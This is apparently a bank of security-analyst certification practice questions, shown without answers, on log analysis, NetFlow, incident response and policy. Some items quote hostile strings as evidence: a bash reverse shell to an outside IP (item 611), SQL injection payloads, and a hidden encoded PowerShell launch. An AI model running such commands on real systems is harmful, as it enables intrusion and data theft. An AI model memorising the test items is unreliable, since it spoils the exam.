Medium589A security analyst is investigating a recent security breach. The analyst discovers that an attacker gained access to the network by exploiting a vulnerability in an unpatched web server. After gaining access, the attacker moved laterally to other systems and exfiltrated sensitive data. The organization wants to improve its security posture to prevent similar incidents. Which security concept best describes the attacker's actions after initial compromise?
Medium590Which TWO of the following are essential components of an effective security policy framework according to Cisco best practices?
Medium591A security analyst is investigating an incident where an attacker gained initial access to a corporate network. The analyst finds that the attacker sent a phishing email with a link to a malicious website that exploited a vulnerability in the user's browser. Which phase of the Cyber Kill Chain does the browser exploitation represent?
Medium592A network analyst finds a PCAP with a series of DNS queries for subdomains like "data12345.example.com" and "data67890.example.com" where the subdomain names appear to contain encoded base64 data. This pattern suggests:
Hard593An analyst receives an alert for 'ET WEB_SERVER Possible SQL Injection Attempt' triggered by a URL parameter containing ' OR 1=1--'. After investigating, the analyst confirms that the web application is not vulnerable to SQL injection and the request was a benign test. How should this alert be classified?
Easy594Which security concept describes the potential for a threat to exploit a vulnerability, and is often expressed as a combination of likelihood and impact?
Easy595A security analyst is reviewing a packet capture from the DMZ and sees a host at 203.0.113.45 sending a flood of TCP segments with the SYN flag set to many different destination ports on a single internal web server, all within a few seconds. The source IP never completes the three-way handshake. Which type of attack is this host most likely performing?
Medium596Which OSI layer is targeted by a TCP SYN flood attack?
Easy597A security analyst is investigating a potential data breach. They need to preserve evidence for legal proceedings. Which action should the analyst take to ensure the integrity of the data?
Medium598A security analyst is reviewing logs to identify a potential brute force attack. Which TWO log entries would be most suspicious? (Choose TWO.)
Medium599A security analyst is investigating a potential data exfiltration incident. The analyst notices that a large amount of data has been sent to an external IP address over port 443 during non-business hours. The company uses a proxy server that logs all outbound connections. Which action should the analyst take first to validate the suspicion?
Medium600An analyst is investigating a PCAP file and wants to reconstruct a conversation between two hosts. Which Wireshark filter would be most appropriate to follow the entire TCP stream?
Medium601A security analyst is reviewing the organization's security policy framework. The analyst notes that the policy defines the acceptable use of company assets, including computers, networks, and data. Which document typically outlines the rules for employee behavior when using these assets?
Easy602Refer to the exhibit. An analyst runs tasklist /SVC on a suspected host. Which process is most suspicious?
Easy603An analyst captures traffic and sees a high number of DNS queries for random subdomains under a single domain, all returning NXDOMAIN. This pattern is typical of which malicious activity?
Hard604An analyst is triaging a Windows 10 host and finds a scheduled task named 'MicrosoftEdgeUpdateTaskMachineUA' that runs a PowerShell script from C:\Users\Public\update.ps1 every 30 minutes. The script base64-decodes a payload and calls Invoke-WebRequest to a remote host. Which action should the analyst take FIRST to preserve evidence while containing the threat?
Hard605Which type of attack does this Snort alert most likely indicate?
Hard606A security analyst is reviewing NetFlow records exported from a Cisco router at the internet edge. During a suspected ransomware staging window, a single internal host shows a sustained outbound flow to one external IP on TCP 443 with 4.2 GB transferred over 40 minutes, while the host's normal baseline for that destination is under 5 MB per day. No corresponding proxy log entry exists for this session. Which conclusion is best supported by these records?
Medium607A security administrator is configuring a firewall rule set to control traffic between the corporate network and the internet. The policy states that only web browsing (HTTP and HTTPS) should be allowed outbound, and all other outbound traffic should be denied. Which type of security control is this an example of?
Easy608In a PCAP, an analyst sees an interactive shell session over TCP with irregular command prompts and responses. Which tool was likely used to generate this traffic?
Hard609Which TWO of the following are best practices when configuring a SIEM correlation rule to detect lateral movement?
Hard610A mid-sized financial firm has a segmented network with a DMZ hosting a web server, an internal network with a database server, and an employee LAN. The security infrastructure includes a next-generation firewall (NGFW) with IPS, an endpoint detection and response (EDR) solution, and a SIEM. Over the past week, the SIEM has generated alerts for unusual outbound connections from the database server to an external IP address 198.51.100.33 on TCP port 443 during non-business hours. The EDR shows no malware on the database server, but a process named 'sqlsrv.exe' (the legitimate SQL Server process) is making these connections. The server's file integrity monitoring indicates that the sqlsrv.exe file has not been modified, but a memory dump reveals injected code that appears to be a reverse shell. The firewall logs show that the outbound connections are allowed because they match an existing rule permitting the database server to reach external update servers. The IP 198.51.100.33 is not on any threat intelligence feed as malicious, but it is geolocated to a country with known cybercrime activity. Which action should the security analyst take FIRST?
Hard611An analyst investigates a Linux web server and finds a bash process spawned by the Apache user, with its parent process being httpd. The bash process has an outbound connection to an external IP on port 443, and the server's audit log shows the command 'bash -i >& /dev/tcp/198.51.100.22/443 0>&1'. Which security monitoring technique most reliably detects this specific attack pattern across the environment?
Hard612A Windows system's security log shows Event ID 4720 followed by 4726 for the same username within minutes. What does this sequence indicate?
Medium613During a PCAP analysis, a security analyst notices an HTTP request with the URI parameter 'id=1 UNION SELECT username,password FROM users--'. What is the most likely attack being attempted?
Hard614In the MITRE ATT&CK framework, TTPs are mapped to:
Easy615A company's data classification policy defines "Confidential" data. Which of the following is an example of Confidential data?
Easy616A security engineer reviews syslog data and sees multiple authentication failures from a single source IP to different SSH servers. The source IP is internal. What does this indicate?
Medium617A hospital's security team is updating its data handling policy. The compliance officer asks which two classification labels are most appropriate for a patient's electronic protected health information (ePHI) under a typical data classification scheme aligned with HIPAA expectations. (Choose two.)
Hard618During which phase of the NIST SP 800-61 Rev 2 incident response process should an organization develop and exercise the incident response plan?
Easy619Which protocol and port combination is used by SNMP for receiving traps?
Easy620An organization is implementing monitoring for encrypted traffic without decrypting it. Which approach would be most effective for detecting malicious activity?
Hard621Which Windows Event ID is recorded when a user account is created, indicating potential unauthorized account creation?
Easy622Which THREE of the following are best practices for creating and maintaining security policies? (Choose three.)
Medium623An organization's security policy specifies that all configuration changes must be approved through a change management process. An analyst discovers that a firewall rule was added without approval. What is the appropriate action?
Easy624A SOC analyst is investigating a potential data exfiltration incident. Which TWO indicators from NetFlow/IPFIX analysis would most strongly suggest data exfiltration?
Medium625Which TWO of the following are typically included in a security policy's scope statement?
Medium626A security analyst is using NetFlow data to investigate a potential data exfiltration incident. Which NetFlow metric is most useful for identifying large volumes of data being transferred to an external IP address?
Medium627An analyst notices that a host is sending large amounts of data to an external IP address on TCP port 22 during non-business hours. What is the most likely activity?
Easy628In a risk management process, after identifying risks, the next step is to determine the potential impact and likelihood. This is known as:
Hard629Which THREE actions are mandatory in the evidence handling process according to standard forensic procedures?
Hard630During an intrusion analysis, an analyst identifies that an attacker used a domain generation algorithm (DGA) to resolve C2 domains. Which of the following traffic patterns is most consistent with DGA?
Medium631During an incident, an analyst finds a workstation that is beaconing to an external IP every 60 seconds using DNS TXT queries. The queries contain long, base64-encoded subdomains. The endpoint has no other suspicious network connections. Which technique is most likely being used?
Hard632A security analyst is reviewing a series of failed login attempts on a critical server. The logs show that the source IP addresses are from multiple geographic regions and the usernames tried are all valid employees. The attempts occur every 5 minutes for the past hour. According to the company's security policy, which type of attack is most likely occurring, and what is the best immediate response?
Hard633Drag and drop the steps for the TCP three-way handshake into the correct order.
Medium634A security analyst is reviewing the organization's incident response plan and notices that it does not specify how to handle a situation where a zero-day vulnerability is exploited before a patch is available. The analyst wants to recommend a proactive measure that aligns with the NIST SP 800-61 revision 2 and the CyberOps Associate curriculum. Which of the following should the analyst recommend?
Medium635An analyst observes a large outbound FTP transfer to an external IP address from a server that normally does not generate such traffic. This is most likely an indicator of:
Hard636Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?
Medium637An analyst is investigating a Linux system for persistence mechanisms. Which TWO of the following are common locations for cron-based persistence? (Select TWO)
Easy638A security manager is drafting a service level agreement (SLA) with a cloud service provider. The SLA must specify the maximum acceptable time for the provider to restore service after a disruption. Which metric should the manager include in the SLA to define this requirement?
Hard639An organization needs to ensure that a document has not been altered and to verify the sender's identity. Which combination of cryptographic techniques should be used?
Hard640A company has implemented a role-based access control (RBAC) policy for its network devices. A network engineer needs temporary access to configure a router in a different region. According to the RBAC policy, what is the appropriate procedure?
Medium641Which three data sources are commonly used in a SIEM for threat hunting? (Choose three.)
Medium642A security analyst is monitoring network traffic and notices a sudden increase in outbound connections from a single workstation to multiple IP addresses on port 443 at regular intervals. The workstation is used for standard office applications. Which action should the analyst take first?
Easy643A SOC analyst monitoring Cisco Stealthwatch Enterprise notices a host inside the network is receiving NetFlow records showing repeated inbound connections on TCP port 3389 from multiple external IP addresses over a short period. The host is a workstation, not a server. Which action should the analyst take first?
Medium644A security analyst analyzes an IDS alert that triggered on the string '/etc/passwd'. What type of signature is this?
Easy645Which TWO are components of the NIST SP 800-61 Rev 2 Preparation phase? (Select two.)
Medium646A Windows Event Log analysis reveals Event ID 4720 and 4726 occurrences for the same account within a short time. Which TWO actions were performed? (Select 2)
Medium647A security analyst is reviewing a Windows workstation that is suspected of being infected with malware that establishes persistence. The analyst wants to check a location that is commonly used by malware to automatically start when a user logs on. Which of the following should the analyst examine?
Easy648During an incident response, an analyst extracts a file from network traffic using Zeek's file analysis feature. The file has a SHA-256 hash that matches a known malware indicator. Which type of IoC is this?
Hard649A network intrusion detection system (NIDS) generates an alert for a known exploit against a web server. The analyst verifies that the server is patched. What is the next best step?
Medium650A company wants to ensure that only authorized employees can enter the server room. Which type of control is a badge reader at the door?
Easy651An analyst is reviewing Snort alerts and notices repeated 'ET SCAN Potential SSH Scan' alerts from the same source IP. Which action should the analyst take next?
Medium652A company uses Cisco Firepower NGFW with intrusion prevention. The security team notices that some legitimate traffic is being blocked by the IPS, causing application outages. The analyst reviews the IPS signature events and finds false positives. What is the best approach to handle this without reducing security posture?
Medium653A security analyst is reviewing a vulnerability scan report and sees a finding labeled 'CVE-2021-44228' with a CVSS score of 10.0. The analyst needs to prioritize remediation. Which factor does the CVSS score primarily represent?
Medium654An analyst suspects data exfiltration via DNS. Which log type would provide the most relevant information to confirm this?
Medium655A company uses Cisco Stealthwatch to monitor network traffic. Which type of data does Stealthwatch primarily rely on for visibility?
Easy656An analyst is reviewing Sysmon logs from a compromised host. They see Event ID 1 (Process creation) for cmd.exe with parent process winword.exe. What does this indicate?
Hard657An analyst sees an alert for 'SQL injection' but the target is an internal application that only accepts POST requests with JSON data. The alert was triggered by a parameter in the URL. What is the most likely issue?
Hard658Based on the exhibit, what is the most likely type of attack being observed?
Hard659An analyst wants to determine if a specific executable has been run on a Windows system. Which artifact provides evidence of prior execution?
Easy660A company's security policy requires that all data classified as 'Confidential' must be encrypted at rest and in transit. This requirement is part of which policy?
Medium661During a security assessment, an analyst uses the Shodan search engine to find exposed industrial control systems. Which phase of the attack lifecycle does this activity represent?
Hard662A SOC analyst is investigating a suspected data exfiltration. The analyst needs to preserve evidence from a compromised workstation. Which of the following is the CORRECT procedure to ensure evidence integrity?
Medium663A security analyst is reviewing the cryptographic mechanisms used to protect data in transit and at rest. The organization wants to ensure confidentiality and integrity for sensitive files stored on a server and for data sent over a VPN. Which TWO of the following mechanisms provide both confidentiality and integrity for data? (Choose two.)
Medium664An incident response plan includes steps to contain a ransomware outbreak. Which TWO actions are typically performed during the containment phase? (Select two.)
Medium665A security analyst is reviewing a Windows 10 host for potential compromise. The analyst runs 'net user' and sees an account named 'Support' that was not created by IT. The account is a member of the local Administrators group. Which Windows Event ID should the analyst check to determine when this account was created?
Medium666During a SYN scan, an attacker sends a SYN packet to a closed port on a target. What response does the target typically send back?
Medium667A SOC analyst is reviewing NetFlow records and notices that a single internal host has initiated connections to 1,024 distinct destination IP addresses on TCP port 445 within a five-minute window. Each connection attempt lasts under one second and transfers fewer than three packets. Which activity does this pattern most strongly indicate?
Medium668A hospital's IT department issues a document that tells administrators the exact sequence of steps to disable a terminated clinician's account, including which systems to check and in what order. The document is mandatory and is referenced during audits. Which type of security documentation does this describe?
Medium669Which TWO of the following are examples of Indicators of Compromise (IoCs) used in network security monitoring? (Choose two.)
Easy670Which two actions should an analyst take when a security monitoring tool generates a high number of false positives for a specific signature? (Choose two.)
Hard671Which TWO actions are appropriate when analyzing network traffic to identify a potential data exfiltration attempt?
Medium672An analyst needs to check for services that were set to start automatically on a Windows host. Which command-line utility can be used to query the state and start type of all services?
Easy673An analyst examining a Linux server notices an unusual cron job in /etc/crontab that runs a script every 5 minutes. Which of the following describes the best approach to determine if this cron job is malicious?
Hard674A network analyst is creating a baseline for normal network traffic. Which TWO metrics should be included to establish a baseline?
Easy675An analyst is performing memory forensics on a Windows machine using Volatility. Which command would be most useful to identify hidden or injected code within a process?
Medium676A financial services firm must retain security event logs for seven years to satisfy regulatory requirements. The SOC manager asks which property of log data must be preserved so that logs cannot be altered or deleted after collection, even by administrators. Which property should the manager emphasize?
Medium677An incident handler collects a hard drive from a compromised server. To maintain chain of custody, which information must be documented?
Medium678In the Cyber Kill Chain model, which phase involves delivering the exploit to the target, such as via email attachment or malicious link?
Easy679An analyst filters PCAP with 'tcp.stream eq 0' and sees an interactive shell session with commands like 'whoami', 'ls -la', 'cd /etc'. The session originated from an HTTP POST to a web shell. Which type of attack is this?
Medium680A security analyst receives an alert that an employee's workstation is generating outbound traffic to a known malware command-and-control IP address at 3:00 AM. According to the company's incident response policy, what is the FIRST action the analyst should take?
Easy681An analyst receives a YARA rule that includes the string 'MZ' at the beginning of a file. What does this indicator typically help identify?
Hard682An analyst is reviewing network traffic and observes a series of DNS queries for long, random-looking subdomains of a single domain, followed by large TXT record responses. The queries occur at regular intervals and the volume is unusually high. Which type of attack is most likely indicated?
Hard683A security analyst is reviewing firewall logs and notices that a workstation is making outbound connections to multiple external IP addresses on port 22 (SSH). The workstation is not authorized to use SSH for external connections. Which type of activity does this most likely indicate?
Easy684A security manager is drafting a data classification policy and wants to ensure handling requirements are applied consistently. Which TWO elements should the policy define for each classification level? (Choose two.)
Hard685An attacker sends an email that appears to come from the company's IT department, asking the recipient to click a link and reset their password due to a security breach. Which type of social engineering is this?
Medium686An analyst is monitoring network traffic and sees a sudden spike in outbound data transfer from an internal server to an external IP that is known to be malicious. What is the most likely scenario?
Easy687A security analyst is reviewing Sysmon telemetry from a workstation that may be compromised. Which TWO event types should the analyst correlate first to identify suspicious process execution and persistence? (Choose two.)
Medium688A Cisco ASA firewall is configured to send syslog messages to a SIEM. Which logging level includes 'informational' messages?
Easy689A company is deploying a new web application and wants to ensure it is secure against common web attacks. Which of the following is the most effective approach to validate the security of the application before going live?
Medium690Match each security tool to its primary purpose.
Medium691A forensic analyst is examining a suspicious file. The file has a high entropy score (close to 8.0) and the PE section names are obfuscated. Which tool or technique would best help determine if the file is packed?
Hard692An organization is conducting a risk assessment and assigns a monetary value to potential losses. Which risk assessment method is being used?
Medium693An analyst is reviewing a network intrusion alert and sees a large number of ICMP echo requests sent from a single external IP to multiple internal hosts. The ICMP payloads are identical and the requests are sent in rapid succession. Which type of activity does this most likely represent?
Easy694An intrusion detection system alerts on traffic that appears to be a command and control (C2) beacon. Which of the following characteristics is most typical of beaconing traffic?
Easy695An IDS detected the following signature match: "ET TROJAN Zeus variant outbound connection to C2 server". The destination IP is flagged as a known malicious host. What should the analyst do FIRST?
Medium696Which TWO host-based analysis techniques are most effective for detecting fileless malware?
Easy697An analyst reviews Cisco ASA syslog messages and sees repeated entries with message ID 106023 denied inbound TCP from an external address to an internal web server on port 443. The web server is expected to receive inbound HTTPS traffic. What should the analyst investigate?
Medium698A security analyst is evaluating the risk of a new web application that will store customer credit card data. The analyst needs to determine the likelihood and impact of a data breach. Which risk analysis approach involves assigning numerical values to assets, threats, and vulnerabilities to calculate an annualized loss expectancy (ALE)?
Medium699An organization uses a SIEM that ingests logs from multiple sources. The analysts are overwhelmed with alerts, many of which are false positives. Which strategy best reduces alert fatigue without increasing risk?
Hard700Which element of the CIA triad is primarily concerned with preventing unauthorized access to data?
Easy701Which THREE of the following are common elements of an incident response policy?
Hard702An organization is implementing a new security control that will verify the integrity of critical system files by comparing their current hash values against known good baseline values. Which security concept does this control primarily address?
Easy703A security analyst is investigating a Windows workstation that experienced a series of failed logon attempts followed by a successful logon. Which TWO Windows Event IDs should the analyst examine to understand this activity?
Medium704An analyst is monitoring network traffic and observes a host making outbound HTTPS connections to a domain that appears to be generated by a Domain Generation Algorithm (DGA). Which phase of the Cyber Kill Chain best describes this activity?
Medium705An analyst is analyzing a suspicious executable file. Using the 'file' command, it returns 'data' instead of 'PE32 executable'. What is the most likely reason?
Medium706A security analyst is examining a suspicious file and wants to determine its reputation and threat score. Which Cisco security solution should the analyst use to query the file's SHA-256 hash and get a verdict?
Easy707Based on the exhibit, which traffic is permitted?
Medium708Drag and drop the steps to implement a disaster recovery plan for a critical server into the correct order.
Medium709Which TWO are goals of a security operations center (SOC)? (Choose two.)
Easy710A security analyst is reviewing the organization's incident response plan and wants to ensure it aligns with the NIST incident response lifecycle. Which two phases are part of the NIST incident response lifecycle? (Choose two.)
Medium711Drag and drop the steps to perform a password recovery on a Cisco IOS router into the correct order.
Medium712A company's security policy requires that all system logs be retained for at least one year. A security analyst discovers that log files are being overwritten after 30 days. What is the most likely cause?
Easy713An organization's security policy requires that all network traffic be inspected by an intrusion prevention system. However, encrypted traffic is bypassing inspection. Which change to the policy would best address this issue?
Hard714An analyst examines a PCAP and finds a series of UDP packets sent to multiple ports on a target. The target responds with ICMP 'Destination Unreachable (Port Unreachable)' messages for each port. What type of scan is being performed?
Hard715Which TWO of the following are characteristics of an advanced persistent threat (APT)?
Easy716Which type of attack is indicated by a series of SMB authentication attempts from one host to multiple other hosts in a short time frame?
Medium717A security analyst receives an alert from the SIEM indicating a large number of failed login attempts from an external IP address targeting a user account. According to the incident response process, what should be the analyst's first action?
Medium718In the NIST SP 800-61 Rev 2 incident response process, which phase involves documenting lessons learned and updating the incident response plan?
Easy719A SOC Tier 2 analyst receives an escalated alert about a potential command-and-control (C2) communication. The analyst needs to correlate network logs with threat intelligence. Which data format and transport protocol pair is specifically designed for standardized threat intelligence sharing?
Hard720Which phase of the NIST Cybersecurity Framework involves actions to limit the impact of a cybersecurity incident?
Easy721Match each cybersecurity framework/standard to its focus.
Medium722A SOC analyst reviewing Cisco Firepower intrusion events notices that a single internal host generated hundreds of alerts for the same signature within a five-minute window, each with a different destination port on the same external IP. The analyst wants to reduce noise before escalating. Which action should the analyst take first?
Medium723An analyst discovers a suspicious service on a Windows host. Which command can be used to query the status and details of services from the command line?
Easy724An analyst detects a large outbound FTP transfer from a sensitive server to an external IP address not previously seen. The file being transferred is a compressed archive containing database dumps. Which Cyber Kill Chain phase is most directly indicated?
Hard725Which TWO components are essential in a well-written security policy?
Easy726An analyst is investigating a Linux server and suspects that an attacker has established persistence by modifying system startup scripts. The analyst runs 'ls -la /etc/rc.local' and finds it has been modified recently. Which TWO additional artifacts should the analyst examine to identify other potential persistence mechanisms? (Choose two.)
Hard727A security team is designing a defense-in-depth strategy. They want to add a control that inspects the actual content of network traffic for known attack signatures and can block or alert on malicious payloads in real time. Which technology best meets this requirement?
Easy728A SOC analyst examines an alert generated by an IDS. The alert indicates a potential SQL injection attempt. However, the analyst finds that the source IP is a known internal web server that performs legitimate database queries. What is the most likely explanation?
Hard729A SOC analyst is investigating a Windows workstation that has been exhibiting unusual outbound connections. Reviewing Sysmon Event ID 3 (Network Connection) logs, the analyst notices a process named svchost.exe with a parent process of cmd.exe initiating connections to an external IP on port 4444. On a healthy system, svchost.exe is normally spawned by services.exe. Which conclusion is most strongly supported by these log entries?
Hard730An analyst is investigating a suspected TCP session hijacking attempt. The analyst reviews a PCAP and sees duplicate packets with the same sequence numbers but different source IP addresses. Which two TCP characteristics would most likely be manipulated in such an attack? (Choose two.)
Medium731An analyst is reviewing logs on a Windows 10 host that is suspected of being compromised. The analyst runs 'wevtutil qe Security /q:"*[System[(EventID=4688)]]" /f:text' and sees that a process named 'powershell.exe' was launched by 'winword.exe' with the command line 'powershell -nop -w hidden -enc SQBFAFgA...'. Which type of malicious activity does this most likely indicate?
Medium732A security manager is updating the organization's data classification policy. The policy must align with the CyberOps Associate curriculum and ensure that data handling procedures are consistent. The manager proposes that data classified as 'Public' should still be encrypted when stored on internal servers. Which principle should guide the manager's decision?
Hard733A security analyst is analyzing a memory dump from a compromised Linux server. Which tool is most appropriate for extracting running processes and network connections from the dump?
Easy734A security analyst is examining a Windows 10 endpoint suspected of compromise. The analyst runs `wmic process get name,processid,executablepath,parentprocessid` and observes a process named `lsass.exe` with PID 1234 and executable path `C:\Windows\Temp\lsass.exe`. The legitimate lsass.exe should reside in `C:\Windows\System32`. Which of the following is the MOST likely explanation?
Hard735An organization wants to ensure the integrity of software updates downloaded from its vendor's website. The vendor provides a hash value for each update. Which TWO properties of hashing algorithms make them suitable for integrity verification? (Choose two.)
Medium736A business impact analysis (BIA) for a critical enterprise application reveals a maximum tolerable downtime (MTD) of 4 hours and a recovery time objective (RTO) of 2 hours. The current backup solution can restore the application in 3 hours under optimal conditions. Which of the following is the most appropriate action from a policy perspective?
Hard737A security policy requires that all remote access be through a VPN using strong authentication. A user calls the help desk saying they cannot connect to the VPN. The analyst checks and sees that the user's token is not synchronized. What should the analyst do?
Easy738A company uses Cisco Firepower NGFW with intrusion prevention. An analyst notices that many legitimate HTTPS connections are being blocked by an IPS rule. What is the best approach to reduce false positives?
Hard739An analyst is investigating a host that is making outbound HTTPS connections to multiple random-looking domains, each with a short TTL. The domains are not in any threat intelligence feeds. Which technique is most likely being used?
Hard740A security analyst is investigating a potential data exfiltration incident. Which TWO of the following network behaviors are indicators of data exfiltration?
Medium741During network intrusion analysis, an analyst reviews a PCAP showing a series of TCP packets where the attacker sends an ACK with a sequence number outside the expected window, followed by packets with overlapping sequence ranges. The analyst suspects the attacker is attempting to evade an IDS by confusing its TCP stream reassembly. Which evasion technique is being used?
Easy742A security analyst is examining a log file and notices that the hash value of a configuration file does not match the expected value. Which security goal has been violated?
Medium743Which TWO types of network traffic should be analyzed to detect a data exfiltration attempt via HTTP? (Choose two.)
Easy744A security analyst is identifying potential vulnerabilities in the network. Which TWO of the following are examples of passive reconnaissance?
Easy745A security analyst notices that a workstation is generating multiple DNS queries to a known malicious domain. Which host-based analysis technique would be most effective in confirming the infection?
Easy746An analyst needs to determine if a host is infected with malware that is attempting to contact a known malicious domain. Which log source is most appropriate for this analysis?
Easy747An IPS sensor is configured inline and drops traffic that triggers the signature 'OVERFLOW-ICMP-ECHO', which triggers on ICMP packets with size > 1024 bytes. A network administrator reports that legitimate network monitoring tools using large ICMP packets are being blocked. What is the best course of action?
Hard748An analyst is reviewing a PCAP of an intrusion and observes that the attacker's machine sent a TCP segment with the ACK flag set to a target host, but the target had never received a SYN from the attacker. The target responded with an RST. The analyst wants to determine what the attacker was attempting. Which technique best describes this activity?
Hard749An organization uses a qualitative risk assessment to evaluate a new vendor. Which characteristic is typical of qualitative risk assessments?
Hard750An analyst reviews a PCAP and sees a host receive an unsolicited ICMP echo reply containing an embedded payload, followed by the host initiating a TCP connection to an internal server on port 445. The ICMP payload begins with bytes that decode to a URL path. Which analysis conclusion is most defensible?
Hard751Refer to the exhibit. An analyst sees repeated denied TCP connections from the same source to the same destination web server. Which of the following actions should the analyst take first?
Hard752A security policy mandates that all employees complete annual security awareness training. Which of the following metrics best demonstrates the effectiveness of this training?
Easy753A company implements a policy requiring all employees to use a hardware token for remote access. This is an example of which type of security control?
Medium754A security team implements a network-based IPS. During testing, they find that legitimate traffic is frequently blocked. Which tuning approach should they prioritize?
Medium755Which TWO of the following are symmetric encryption algorithms? (Choose two.)
Easy756Which log type would an analyst examine to view details about HTTP methods (GET, POST), response codes, and user-agent strings?
Easy757Drag and drop the steps to analyze a packet capture for suspicious activity into the correct order.
Medium758During a host-based analysis, a Windows system is found to have a suspicious service that starts automatically. Which command-line tool can be used to query the status and configuration of services, particularly to identify non-standard service names or paths?
Medium759Which Windows registry hive is most likely to contain evidence of malware persistence via a service?
Easy760A security analyst discovers that a server's configuration allows users to access files outside of their intended directory. In security terminology, what is this weakness called?
Medium761Refer to the exhibit. A network analyst sees these firewall logs. What is the most likely interpretation?
Medium762A security monitoring tool generates an alert for a user accessing a sensitive file at an unusual hour. What is the most appropriate next step?
Easy763MedSecure is a healthcare organization with a security policy that requires all security incidents to be handled following the NIST framework. A system administrator discovers that an unauthorized user has accessed a database containing patient records. The administrator immediately disconnects the server from the network. The security analyst is called to investigate. The analyst finds that the server was not part of the centralized logging system, and the only logs available are the database audit logs. The security policy mandates preservation of evidence and chain of custody. The analyst needs to collect the database audit logs. Which action should the analyst take to ensure proper evidence collection?
Hard764A network analyst is investigating a suspected DNS tunneling attack. Which THREE of the following are indicators of DNS tunneling?
Medium765An analyst is investigating a host that is suspected of being compromised. The host's security logs show multiple failed login attempts followed by a successful login from an unusual IP address, and then a series of outbound connections to known malicious destinations. Which TWO actions should the analyst take immediately? (Choose two.)
Hard766A hospital's security team discovers that a network device is silently forwarding copies of all traffic to an internal host that no administrator recognizes. The device is a managed switch that connects the radiology VLAN to the core. Which attack has most likely been implemented against this switch?
Medium767A company operating in the EU experiences a data breach involving personal data of EU citizens. Under GDPR, what is the maximum timeframe to notify the supervisory authority?
Hard768An analyst is examining a firewall log entry: '2023-10-25 14:30:00 ACTION=DENY SRC=10.0.0.5 DST=203.0.113.50 PROTO=TCP SPT=445 DPT=445'. Which statement best describes this event?
Medium769Which of the following is an example of a symmetric encryption algorithm?
Medium770During which phase of the NIST SP 800-61 Rev 2 incident response process does an organization develop an incident response plan and assemble a team?
Easy771Which TWO are common indicators of a compromised host? (Choose two.)
Medium772A SOC analyst is reviewing a Windows 10 endpoint that is suspected of being compromised by malware that hides its network connections. The analyst runs 'netstat -anob' on the live system but does not see any suspicious outbound connections. Which Windows artifact should the analyst examine next to identify network connections that may have been hidden from the live API?
Medium773Drag and drop the steps to configure SSH access on a Cisco IOS switch into the correct order.
Medium774An organization's security policy requires that all traffic between the corporate network and the internet be inspected by an IPS. However, encrypted traffic (HTTPS) cannot be inspected without breaking encryption. Which solution best meets the policy requirement?
Hard775During a host-based investigation, an analyst finds a process named 'svchost.exe' consuming high CPU. The process path is 'C:\Windows\Temp\svchost.exe'. What should the analyst conclude?
Medium776Refer to the exhibit. A host-based analyst reviews auth.log. What does the accepted password log entry indicate?
Medium777A security analyst is reviewing Windows Event Logs to determine if a user account was recently created on a compromised host. Which Windows Event ID should the analyst look for in the Security log to identify user account creation events?
Easy778A financial services firm must comply with regulations covering cardholder data. The security team is mapping its controls to the PCI DSS framework and wants to confirm that the framework's requirements are being met before an upcoming assessment. Which statement best describes what PCI DSS provides to the organization?
Medium779A security analyst is examining a PCAP and observes a series of TCP packets with the PSH flag set and small payload sizes, sent from an internal host to an external IP. The packets are spaced roughly 30 seconds apart. Which type of malicious activity is MOST likely indicated?
Medium780A small retail company uses a cloud-based point-of-sale (POS) system. The IT manager receives an alert from the cloud provider that the POS application is generating an unusually high number of outbound connections to an IP address in a foreign country. The POS application is only supposed to communicate with the cloud provider's servers in the United States. The IT manager checks the POS terminal logs and finds that a new user account was created locally on the terminal with administrative privileges two days ago. The terminal does not have antivirus installed. What should the IT manager do first to contain the incident and prevent data loss?
Easy781An intrusion detection system (IDS) generates an alert for a packet containing the string '/etc/passwd'. What type of attack is likely detected?
Easy782Which TWO of the following are indicators of a network intrusion? (Choose two.)
Medium783A SOC analyst is reviewing DNS logs and suspects that a host is communicating with a domain generation algorithm (DGA) used by malware. Which TWO characteristics in the DNS logs would most strongly support this suspicion? (Choose two.)
Medium784A network security analyst is examining a packet capture in Wireshark and notices a series of TCP packets with the PSH, ACK flags set, and a payload containing the string 'cmd.exe /c whoami'. The packets are destined to port 445 on an internal server. Which type of malicious activity is most likely indicated?
Hard785A SOC analyst is investigating a suspected data exfiltration event on a corporate network. The analyst runs a Wireshark display filter on a captured PCAP and sees a large volume of outbound packets from an internal workstation to an external IP address, all with the same destination port and with the TCP PSH flag set on nearly every packet. The payloads are small but consistently sized, and the transfer continues for over 30 minutes. Which statement best explains why this traffic pattern is suspicious in the context of network intrusion analysis?
Medium786A financial services firm is building a threat model and wants to classify an attacker who is highly skilled, well funded, and focused on stealing intellectual property from a specific set of companies over a long period. Which threat actor category best fits this profile?
Hard787An analyst is examining a Windows system for evidence of malware that maintains persistence by modifying the Image File Execution Options (IFEO) registry key. Which of the following best describes how this technique works?
Medium788An organization wants to ensure that a user cannot deny having sent an email. Which security goal does this address?
Hard789Refer to the exhibit. An analyst sees this syslog message from a Cisco ASA. What does this log entry indicate?
Medium790During the Containment, Eradication, and Recovery phase, the incident response team collects evidence from a compromised system. Which document is used to record the chain of custody?
Medium791A threat hunter identifies a binary that uses a Domain Generation Algorithm (DGA) to create domain names like 'eksdghf23.com', 'mzncxv89.net' each day. The malware contacts these domains over HTTPS. Which phase of the Cyber Kill Chain is most directly associated with this technique?
Hard792A company's security policy requires that sensitive data be encrypted at rest using AES-256. Which type of encryption does AES-256 represent?
Medium793A junior analyst is asked to determine which log source would best reveal an attacker attempting to authenticate to a Windows file server with stolen credentials over the network. Which source should the analyst consult first?
Easy794An analyst is investigating a potential data exfiltration incident. The only available data is NetFlow records from Cisco routers. Which NetFlow field would be most useful to identify large outbound transfers to an unusual external host?
Hard795An analyst is investigating lateral movement and observes SMB authentication attempts from host A to multiple other hosts using NTLM authentication with a hash value instead of a password. Which attack technique is most likely being used?
Hard796An analyst is reviewing Windows Event Logs and finds Event ID 4648. What does this event typically indicate?
Medium797Which TWO actions are characteristic of a port scan performed by an attacker? (Choose two.)
Easy798A security analyst discovers that a malicious actor is using a technique to gather information about employees by searching social media sites. Which type of attack is being performed?
Easy799An attacker intercepts communication between a client and a server, allowing the attacker to read, insert, and modify messages in both directions. Which type of network attack is this?
Hard800A threat hunter is examining a Linux web server that is suspected of being compromised. The hunter wants to identify suspicious processes that may be communicating with external command-and-control infrastructure and to understand what files those processes have open. Which TWO artifacts or commands should the hunter use to accomplish these goals? (Choose two.)
Medium801A SOC analyst is reviewing proxy logs and wants to identify indicators of potential data exfiltration over HTTP. Which two patterns should the analyst treat as suspicious? (Choose two.)
